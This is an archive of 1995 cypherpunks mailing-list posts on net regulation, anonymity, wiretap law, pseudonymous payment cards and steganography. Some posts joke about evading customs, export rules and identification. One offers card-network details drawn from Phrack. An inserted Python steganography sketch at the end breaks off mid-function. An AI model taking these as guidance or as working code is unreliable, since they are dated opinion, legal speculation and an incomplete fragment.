rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 7 Jan 95 03:08:51 PST
To: cypherpunks@toad.com
Subject: Compliance and lax Customs
Message-ID: <gate.XkPDyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



In India telco (and several other) laws are ridiculously outdated (see my
"FREEdom on the Net in India" Electrosphere, WIRED 3.01), although our
Customs are pretty techno-savvy, as they need to know prices off the cuff
for all the goodies people try to smuggle in without duty. But we're quite
adept here at ignoring many of the more inconvenient laws - I just bought
myself a new 540 mb hard disk for the equivalent of $350, and none of the
BBSes pay the required $50,000/year license fee.

It's nice to know that the US Customs are catching up with the technical
incompetence one sees in the LEAs here. But I guess American Cypherpunks are
too compliant to attempt to take advantage of such things. In fact, there's
been a noticeable slump in the mirroring of crypto from US-only ftp sites to
Europe. Obviously Cypherpunks are far more law-abiding in _practice_ than
the media would have us believe, based on what they _discuss_ ;-)

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 3 Jan 95 11:05:37 PST
To: cypherpunks@toad.com
Subject: Re: Press attack on anonymity.
In-Reply-To: <Pine.3.89.9501030943.A4287-0100000@netcom10>
Message-ID: <Pine.HPP.3.91.950103194933.7114A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:

> higher authority of which I spoke earlier -- who is
> anonymously attacking anonymity.

> the government speaking  -- a government department with guns is
> running up a trial balloon.

Expected and hardly anything to go into public dispute about.
Cypherpunks are here to circumvent the measures of various
governments by technical means. Since Joe User doesn't really
care if he can connect anonymously or not, at least not yet,
they might very well succeed in making some aspects of anonymity
'illegal'. But who cares, if anonymous agents can't be traced?

Mats 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 7 Jan 95 03:09:04 PST
To: cypherpunks@toad.com
Subject: Law and ethics on the Net
Message-ID: <gate.kHRDyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain




>              ABA SCI/TECH SECTION, IPPP COMMITTEE
>                   LAW AND ETHICS ON THE "NETS"
>                         December 8, 1994

I've been on the Cypherpunk's mailing list for about half its lifetime,
am a technology consultant based in New Delhi, do a weekly column on
information society which has covered many of the issues you seem interested
in, and write for WIRED magazine. I am interested in law and ethics in
cyberspace, and would like to participate in your project, as long as it
is not primarily intended to culminate in a set of guidelines for legislation,
which I believe to be pointless. I'm including here some comments to your 
original announcement, which I only saw today. 

>      The development of a national information infrastructure and
> a global electronic network, of which Internet is the backbone, has
> presented a multitude of legal and ethical problems involving use
> and abuse of the networks, nationally and worldwide.  Almost on a
> daily basis, news items announce electronic network transmissions
> constituting hate mail, profanity, vulgarity, obscenity, child
> pornography, sexual harassment, defamation and invasion of privacy.

Unfortunately, due to the way media works, we don't read of the benefits of
total anonymity to participants in sexual abuse groups, human rights activists
and many others. Going by what we read in the media, 93.5% of people on the 
Net are habitual child abusers, and 62% are nuclear-equipped narco-terrorists.

> The violation of intellectual property rights and information
> system security are also frequent occurrences.  National and
> international discussions consider such questions as what "rules of
> the road" ought to apply, who can make them, how can they be
> enforced, and what will be the legal and political relationships
> between states and nations regarding cyberspace?  It is argued that
> at present the lawless, the intolerant and the disrespectful seem
> able to pollute the worldwide information stream with little
> constraint.

Or free it from the monopoly of large media organizations. Ninety-five percent
of the world's news is distributed by four agencies, who effectively shape our
view of the world at large, and decide for us the crises du jour. The Net,
_precisely_ because of its unregulated, bottom-up structure, allowed activists
to communicate during the revolution in Chiapas, Mexico; got international 
agencies to offer support for the massive earthquake in Latur India at once,
rather than wait for a Time magazine photo feature (which - surprise! - was
on Somalia just days before the world suddenly took notice of _that_ problem).

The commitment to freedom of expression, in _any form whatsoever_ including
the anonymous, is arguably the cause for much of the economic and technological
power of the US. It is a matter for concern that, rather than help spread
this freedom to the rest of the world (as is inevitable _if_ the Internet
continues not to be 'governed'), many in and out of government are attempting
to clamp down, out of an almost primeval fear of Digital Evil that stems from
ignorance of wider issues.

>      Certainly, the current state of anarchy in national and global
> electronic networks cannot continue if the technology is to achieve
> the remarkable benefits that have been predicted in terms of
> communications among institutions and individuals, whether
> government, business or society at large.  The purpose of the

On the contrary, the 'current state of anarchy' has largely been responsible
for advancements in US research for the two decades since the Internet was
born. What is needed, perhaps, is a dialogue to improve understanding among
'society at large' of a community that is, though at present largely composed 
of technology professionals or academics, an example of multicultural and 
multinational cooperation and tolerance that would be nice to see in, say,
Los Angeles, or elsewhere in the 'real world'.

> George B. Trubow, Professor of Law
> Director, Center for Informatics Law
> The John Marshall Law School
> 315 S. Plymouth Ct.
> Chicago, IL 60604-3907
> Fax: 312-427-8307; Voice: 312-987-1445
> E-mail: 7trubow@jmls.edu

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 3 Jan 95 17:48:13 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <9501040140.AA27685@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:16 AM 1/3/95 -0500, Robert Hettinga wrote:

>Hmmm. What if you produced a pseudonym card *with* your picture on the
>front?  I smell a market opportunity. Or not...

You'd need to prominently state on the front "not to be used for id" or some 
such.  Otherwise you could potentially get nailed for issuing fraudulent 
identity documents.  Too many places think that a MC/Visa is a form of id.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 3 Jan 95 17:48:08 PST
To: Hal <cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <9501040140.AB27685@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:45 AM 1/3/95 -0800, Hal wrote:
> ... As I wrote, banks are
>required to get SS#'s for depositers right now, and I wouldn't expect
>that to change any time soon.  If anything, the trend appears to be
>towards more tightening rather than less.  ...

Isn't that only a requirement on interest-bearing, or potentially 
interest-bearing, accounts?  

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VAMAGUS@delphi.com
Date: Tue, 3 Jan 95 18:16:11 PST
To: cypherpunks@toad.com
Subject: H.R.4922
Message-ID: <01HLF9W9HYG2938CN8@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If I am digging up old info please excuse me, I haven't been able
to read the majority of mail due to the volume of, fluff, shall
we say.

For U.S. cypherpunks this is it:
H.R. 4922 "Interception of Digital and Other Communications"
passed as of October. This is the first *I* heard about it.
In short the bill requires:
" ...telecommunications carrier shall insure that its equipment,
facilities, or services are capable of (1) expeditiously isolating and
enabling the government, pursuant to a court order or other
authorization, to intercept, to the exclusion of all other communications,
all wire and electronic communications carried by the carrier....etc.

Time for me to generate more keys!

More info available at:
ftp.eff.org     /pub/EFF/Policy/Digital_Telephony/digtel94.bill
gopher.eff.org  /1/EFF/Policy/Digital_Telephony/digtel94.bill
http.eff.org    /pub/EFF/Policy/Digital_Telephony/digtel94.bill

***************************Frenchie Sends*******************************
*      PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9  on request.     *
*         As soon as any man says of the affairs of the state          *
*    "What does it matter to me?" the state may be given up for lost.  *
*                 J.J.Rousseau - The Social Contract                   *
*   PGP info: email to mail-server@rtfm.mit.edu with first line:       *
*                 send pub/usenet/alt.security.pgp/*                   *
*****************************J. Francois********************************

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwoD8LbmxeO+s+1xAQEuCgQAlI0vevAU7Gc1rkraQufpw+1NT9n2qSw5
DIoJvA0lS49ECiZeUOhwNql3cx6tPaOEeMeJIqkcv/PecX3wh3I2AzU2NGmNerOM
Z2HPjdoz3xO8u0wDOJbZDRlzQafzbh0RShxAlCxPQE+qspWhmtydMvRl6KtvT1T+
s/kMO5VMkQY=
=r8C+
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 3 Jan 95 22:13:21 PST
To: bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Subject: Re: Book review: Codebreakers, the Inside Story of Bletchley Park
In-Reply-To: <9501040525.AA10625@anchor.ho.att.com>
Message-ID: <199501040551.VAA12193@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


bill.stewart@pleasantonca.ncr.com +1-510-484-6204 wrote:
> 
> Another book with some insight into Bletchley Park is
> "Cloak and Gown" (I forget the author), about the relationship between
> Yale academics and the OSS, the WW2 predecessor to the CIA.

That's by Robin Winks. I have a copy, in hardback, that I found some
years back in a used book store. Lots of good stuff about the central
role Yale has played.

> Among the various Yalies who went into the OSS was James Jesus Angleton,
> who spent a lot of time at Bletchley analyzing information that might
> be useful for US Army and covert OSS activities, and trying to support
...

A friend of mine, Buddy Diamond, developer of the "NFL Challenge" PC
game of some years back, worked with James J. Angleton on a kind of
"CIA Challenge" training game. I met Buddy at the 1988 Crypto
conference, and he was the main reason I got invited to the Hackers
Conference that year (and thereafter, as is the norm). Oh, he went to
Yale, and this had a lot to do with the CIA getting in touch with him.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 3 Jan 95 19:04:02 PST
To: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Subject: Re: Calls for Reg. [Cypherpunks=Quick&Smart]
In-Reply-To: <Pine.3.89.9501031601.A517-0100000@nesta.pr.mcs.net>
Message-ID: <Pine.SUN.3.91.950103220134.7988C-100000@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Nesta Stubbs wrote:

> Date: Tue, 3 Jan 1995 16:34:22 +0000
> From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
> To: Cypherpunks <cypherpunks@toad.com>
> Subject: calls for regulation
> 
> 
> 	This is pretty scary, I mean it always sat in the back of my mind 
> that they would attempt to regulate the net, and to pass legislation and 
> all, but now that it is rearing its head and looks like there is going 
> to be a push for it, I am actually concerned, to the point of fear 
> almost. 

Let me blow all your horns.

Kudos to the exposure.

Just goes to support my theory that cypherpunks tend to be way ahead of 
the rest of the world in predicting political moves.

I have little doubt this one will come to a head as well.


> 
> i want to know everything          http://www.mcs.com/~nesta/home.html
> i want to be everywhere                     Nesta's Home Page        
> i want to fuck everyone in the world               &
> i want to do something that matters         /-/ a s t e zine
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 3 Jan 95 19:16:57 PST
To: VAMAGUS@delphi.com
Subject: Re: H.R.4922
In-Reply-To: <01HLF9W9HYG2938CN8@delphi.com>
Message-ID: <Pine.SUN.3.91.950103220633.7988D-100000@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995 VAMAGUS@delphi.com wrote:

> Date: Tue, 03 Jan 1995 21:16:31 -0500 (EST)
> From: VAMAGUS@delphi.com
> To: cypherpunks@toad.com
> Subject: H.R.4922
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> If I am digging up old info please excuse me, I haven't been able
> to read the majority of mail due to the volume of, fluff, shall
> we say.
> 
> For U.S. cypherpunks this is it:
> H.R. 4922 "Interception of Digital and Other Communications"
> passed as of October. This is the first *I* heard about it.
> In short the bill requires:
> " ...telecommunications carrier shall insure that its equipment,
> facilities, or services are capable of (1) expeditiously isolating and
> enabling the government, pursuant to a court order or other
> authorization, to intercept, to the exclusion of all other communications,
> all wire and electronic communications carried by the carrier....etc.
> 
> Time for me to generate more keys!


I assume you are concerned that this requires carriers to provide 
plaintext even if the end users are encrypting.  It really does not.

If you are simply concerned about mandated interception ability plain or 
cypher, it's mildly old news.

> 
> More info available at:
> ftp.eff.org     /pub/EFF/Policy/Digital_Telephony/digtel94.bill
> gopher.eff.org  /1/EFF/Policy/Digital_Telephony/digtel94.bill
> http.eff.org    /pub/EFF/Policy/Digital_Telephony/digtel94.bill
> 
> ***************************Frenchie Sends*******************************
> *      PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9  on request.     *
> *         As soon as any man says of the affairs of the state          *
> *    "What does it matter to me?" the state may be given up for lost.  *
> *                 J.J.Rousseau - The Social Contract                   *
> *   PGP info: email to mail-server@rtfm.mit.edu with first line:       *
> *                 send pub/usenet/alt.security.pgp/*                   *
> *****************************J. Francois********************************
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBLwoD8LbmxeO+s+1xAQEuCgQAlI0vevAU7Gc1rkraQufpw+1NT9n2qSw5
> DIoJvA0lS49ECiZeUOhwNql3cx6tPaOEeMeJIqkcv/PecX3wh3I2AzU2NGmNerOM
> Z2HPjdoz3xO8u0wDOJbZDRlzQafzbh0RShxAlCxPQE+qspWhmtydMvRl6KtvT1T+
> s/kMO5VMkQY=
> =r8C+
> -----END PGP SIGNATURE-----
> 
> 
> 
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Tue, 3 Jan 95 19:30:34 PST
To: Raph Levien <raph@netcom.com>
Subject: Re: Siegel and Lewis
In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com>
Message-ID: <Pine.SV4.3.91.950103221946.23162A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


>    Martha Siegel is just fucked up enough that she will probably push
> for legislation regulating the nets. Congress is just fucked up that
> they might pass it.

   And if they do I will make it a definite point to do all I can to 
emigrate to the UK, the Netherlands, or somewhere else.

   This country is increasingly becoming a police state, and I've got too 
many years of life left to just passively deal with it.

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Tue, 3 Jan 95 19:32:00 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <9501040140.AB27685@eri.erinet.com>
Message-ID: <Pine.SV4.3.91.950103222122.23162B-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> I've heard of that, but I thought it was only a redundancy check to check 
> for read errors in the swiping process.

   That's why they use checksums - I have some information about the 
VISA-net authorization network (which came from Phrack) and also some 
about the actual encoding of the card, if anyone cares.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Tue, 3 Jan 95 19:25:24 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: San Francisco Editorial
In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950103221256.28053B-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Hal wrote:

> Another point re Canter and Siegel is that there is now a service
> calling itself CancelMoose which goes through Julf's anon server in
> Finland (anon.penet.fi) to cancel spams.

	This is a common misconception. Cancelmoose[tm] doesn't use 
anon.penet.fi for cancelling spams -- she telnets directly into the NNTP 
server of a university in Norway. Strangely enough, this is the same 
university where Arnt Gulbrandsen works. Arnt, if you don't already know, 
is the Norwegian hacker who wrote the cancelbots that are being used 
against spams (Canter & Siegel's included). Cancelmoose[tm] is reachable 
through anon.penet.fi for comments, and she always lists the <naXXXXXX> 
form of the address (non-double-blinded).

> The scary thing about cancels is that some proposals have actually been
> directed at anonymous posts themselves.  Someone anonymously posted
> what purported to be a grisly transcript of the last seconds of the
> doomed Challenger crew as they fell to the ocean.  This caused a great
> hue and cry and some calls for banning anonymous posts and/or
> retroactively cancelling them.  This led to some very amusing events
> which Detweiler has chronicled in his FAQ on anonymity, the net result
> of which was that the idea was discredited.  But the emergence of
> CancelMoose is not an altogether positive event in my view.

	Dick Depew and AARM (Auto-Active Retro Moderation). He wanted to 
cancelbot any posting from anon.penet.fi in the Big Seven Usenet hierarchies.
He was promptly beaten down by the net. Feh.

-mbh-

ObCrypto: I've been working on a draft paper that puts forward a proposal 
to make Usenet articles uncancellable except by [1] the original author 
of the article or [2] the system admin who runs the NNTP server the 
article issued from. The problem with this is that it eliminates 
Cancelmoose[tm] and the other spam cancellers, who, IMHO, are Good Things.
--
Michael Handler <grendel@netaxs.com>                        Philadelphia, PA
Civil Liberty Through Complex Mathematics           s.s.y.g-l-b co-moderator
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"They like to watch everything you do / Transmitters hidden in the wall"--JD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Tue, 3 Jan 95 20:31:47 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: EVEN MORE creis for regulation
Message-ID: <Pine.3.89.9501032226.B3220-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain



Yet ANOTHER call for net regulation.  There are so many now I am hard 
pressed to keep track of them.  It appears that the media may adopt 
"regulation of the Internet" as its next babe. Ya know how they adopted 
the Internet itself first, now watch as the entire mainstream media is 
flooded with calls for net regulation.



Bigots' Growing Use Of Computer Networks Assailed

The Simon Wiesenthal Center on 12-13-94 sent a letter to Prodigy protesting
bigots online messages of hate. Rabbi Abraham Cooper of the center decries
the growing use by hate groups. The Wiesenthal Center wants government
policing of the internet. They fear one-sided exposure of youths to white
supremacist messages. Civil libertarians and white supremacists say that
free speech should prevail. Marc Rotenberg of the Electronic Privacy Info
Center says that it's a difficult issue and that censorship and control are
very inappropriate. White supremacist groups like the National Alliance and
the American Renaissance can spread propaganda nationwide. These types of
hate groups are kept out of mainstream media and are thus short of funds.
Valerie Filds of West LA said she saw an anti latino diatribe on Prodigy that
plugged American Renaissance of Louisville KY. She says she saw a message
that seemed to be from a white supremacist group. She says she saw one 
referring to the "Diary of Anne Frank" as a "Jewish Hoax". The Wiesenthal
center wants such messages deleted. Anti-semitic comments on Prodigy in 1991
resulted in a policy prohibiting "blatant expressions of hatred". Kevin Strom,
who produces a radio show for National Alliance, said he was recently blocked
from forums on Compuserve. He said that "the system operator decided we
didn't deserve free speech."  His article "The Wisdom of Henry Ford" about the
book "The International Jew" was downloaded 120 times. Georgia Griffith of
Compuserve said "we are not obliged to publish it for him."  There are 5 m
subscribers to commercial online services, 2 m to Prodigy, 20 m accessing
the internet.  Rabbi Cooper wants the FCC to place a cop on the internet. 
White supremacist propaganda is available on the internet. The Institute for
Historical Review's article "Frequently Asked Questions about National
Socialism" is available. Far-right activists say anonymity removes
inhibitions too. The 
National Alliance uses Netcom Online Communications Services in California.
Texts and promotions of its radio show are available there. National Alliance
chairman William Pierce said "The major media in this country are very biased
against our political point of view. They present us with ridicule or in a
very distorted way. The information superhighway is much more free of
censorship."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Tue, 3 Jan 95 22:37:33 PST
To: hfinney@shell.portal.com
Subject: Re: San Francisco Editorial
In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com>
Message-ID: <m0rPOn0-0007GuC@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In cypherpunks Hal Finney writes:

>Another point re Canter and Siegel is that there is now a service
>calling itself CancelMoose which goes through Julf's anon server in
>Finland (anon.penet.fi) to cancel spams.  (Spams are off-topic,

Um, not exactly.  CancelMoose has a mailing address on the anon.penet.fi
server, for the benefit of those who wish to contact him, but the cancels
are injected elsewhere.  I don't believe anon.penet.fi lets you send 
control messages (of which cancels are a subject) thru it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 3 Jan 95 21:26:57 PST
To: gnu@toad.com
Subject: Re:  Book review: Codebreakers, the Inside Story of Bletchley Park
Message-ID: <9501040525.AA10625@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Another book with some insight into Bletchley Park is
"Cloak and Gown" (I forget the author), about the relationship between
Yale academics and the OSS, the WW2 predecessor to the CIA.

Among the various Yalies who went into the OSS was James Jesus Angleton,
who spent a lot of time at Bletchley analyzing information that might
be useful for US Army and covert OSS activities, and trying to support
counterintelligence work by correlating the information from intercepts
of German understanding of US and British plans with the Allied
sources and users of those plans, to try to find leaks, traitors,
moles, spies, and other types that counter-spook spooks worry about.

Besides the Enigma interceptions themselves, the big secret the OSS
and British intelligence were paranoid about protecting was that all the 
known German spies in Great Britain had been caught and 
turned for disinformation use (or killed); almost everything Germany
was getting from its spies was bogus.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 3 Jan 95 22:02:05 PST
To: cypherpunks@toad.com
Subject: Re: SAN FRANCISCO EDITORIAL
Message-ID: <199501040602.AA11010@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



The scandalous Finland anonymous remailer is also used for good.
The Samaritans, an organization in England devoted to helping
folks who are thinking of suicide, often receives notes filtered
through it. 

If someone sends me the right address, I'll send a letter to the 
Comical explaining this politely. 

We should stress the strength of anonymity.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 7 Jan 95 04:25:18 PST
To: cypherpunks@toad.com
Subject: 3D TV and crypto
Message-ID: <gate.Fo5Dyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



This just might have a crypto app ;-)

Just saw a BBC WSTV report on a 3D TV developed in the UK. Unlike other
extremely expensive 3D TVs based on laser-holograms, this one has an ordinary
hi-def screen, pointing upwards. A beam splitter crosses the screen at an
angle, and reflectors are above and to the side, so the image actually forms
as an intersection of three beams in mid-air. A profile view:

               vvvvvvvvvv     <--- reflects down
                 v ^   /<
   image    <  < v ^ /< < 
   forms         v /> > <     <--- reflects left
   here     <  < / ^< < <
   mid-air     /   ^    <
               ^^^^^^^^^^     <--- TV image is formed here, facing up
               
The company says 'affordable' models could appear next year.

ObCrypto: Suppose the reflector(s) is another TV, displaying a moving-image
'key'? The main TV image could be 'encrypted' by subtracting the 'key' from
itself... Voila! And there's more... Suppose the 'key' is light passed through
a human hand...

Oh you thought the first e-mail from a head of state was from Sweden? Queen
Elizabeth II sent one in the 70s - according to a wonderful episode of BBC's
Tomorrow's World, which did a cyberspace episode that included a sort-of
solution to the travelling salesman problem by BT physicists using evolutionary
algorithms! The episode DID NOT MENTION CHILD PORNOGRAPHY!!!!

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 3 Jan 95 22:53:32 PST
To: bmorris@netcom.com
Subject: Re: Anonymous payment scheme
Message-ID: <9501040637.AA11348@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> HH> So, you may be able to have a form of anonymity from the person you ar
> HH> transacting with, but I don't think you can be anonymous from the bank
> HH> and from the government.  And personally, I am more concerned about th
> With a debit card you can't be anonymous, because your money resides in
> the bank.  With digital cash, and the ability to transfer money to
> another digital cash card via phone lines, I don't see how they can
> successfully trace everything.  They will try, no doubt.

I thought the origination of this thread was a hypothetical proposal
to start a Cypherpunks Bank which would join Visa and issue debit cards;
they could be started for cash, under pseudonyms, and would expire
when they ran dry.  So you and your 10,000 closest friends could
call yourselves anything you want, and the merchant would know that
Johnny Cash Foobar buys a lot of pharmaceutical manufacturing equipment, 
but doesn't know who he is.  The bank's not paying interest, so they
probably don't need SSNs until the next round of privacy-prevention laws,
and they're not using them as credit-validation tools since they're
only issuing debit cards to cash customers anyway.  Meanwhile,
it gets to hire lots of lawyers, pay Visa commissions,
and collect interest on the float.  And if you get tired of being
Johnny Cash Foobar, or don't like having your purchases correlated,
John Hancock's card can buy the motorboats and Joe Toshiba's
can pay for the precision machine tools...

The standard merchant contract with Visa/Mastercharge used to forbid
merchants from asking for additional ID unless they suspected fraud;
I think some states have made laws about this as well.

	Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 3 Jan 95 22:53:36 PST
To: jamesd@netcom.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <9501040641.AA11386@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


James Donald writes:
> On Mon, 2 Jan 1995, Carol Anne Braddock wrote:
> > Right now, I don't think U.S. Customs is going to ask you if you
> > have PGP in your PC if you leave the country, or return either.
> > 
> > They should, and I'd be proud to say yes.
> 
> Well Carol, I am sure your heart is in the right place, but I
> do not agree.
> 
> They should not, and I'd be deranged to say yes.

Of course you'd be deranged to say yes, but just imagine what
would happen if every Customs Thug were required to ask everyone
carrying a PC into or out of the country if they had any software
on it capable of protecting the privacy of their files or communications,
and requiring major paperwork of anyone who said yes....
the law would be gone in a week.

My latest beef with the customs thugs was when I last came back from
Mexico, I noticed that their arm badges said something about like
	"U.S. Customs Service - Protectors of Independence"
Arrrgh!


			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 3 Jan 95 22:53:38 PST
To: cypherpunks@toad.com
Subject: Art and Crypto - Re: I'm back. :)
Message-ID: <9501040652.AA11466@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Lile Elam writes
> I finally got back on cypherpunks. Have been incredibly busy
> but wanted to keep in touch as several artist friends of mine
> want to start using art as an encryption vehicle... Should be fun...

It works on so many levels, as well 
- hiding encrypted bits in the low-order bits of pixel color values
- representing data in the colored spots on a Seurat impressionist work
	or the lines and splotches on a Jackson Pollock imitation
- wondering what the artist _really meant_ by a given figure :-)

It also may be a good way to nag us into doing stealthy versions
of PGP and other cryptosystem headers - steganography is less useful
when the encrypted message always starts off with
- ----- BEGIN PGP ENCRYPTED FILE 
and has the recipient's keyid readily findable as well.

			Bill
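
[Added example, not part of Bill's message or of PGP: a sketch of the point above that data hidden in the low-order bits of pixel values stops being hidden once it carries a fixed, known header or key ID. The pixel list, payload bodies and key ID are constructed sample values; the marker is PGP's real ASCII-armor line "-----BEGIN PGP MESSAGE-----", and random bytes stand in for a hypothetical header-free "stealth" ciphertext.]

```python
import random

# Real PGP ASCII-armor header line; any fixed, known byte string behaves the same.
ARMOR_HEADER = b"-----BEGIN PGP MESSAGE-----"


def to_bits(data):
    """Expand bytes into a list of bits, most significant bit first."""
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def from_bits(bits):
    """Pack a bit list (MSB first) into bytes; a trailing partial byte is dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def embed(pixels, payload, offset=0):
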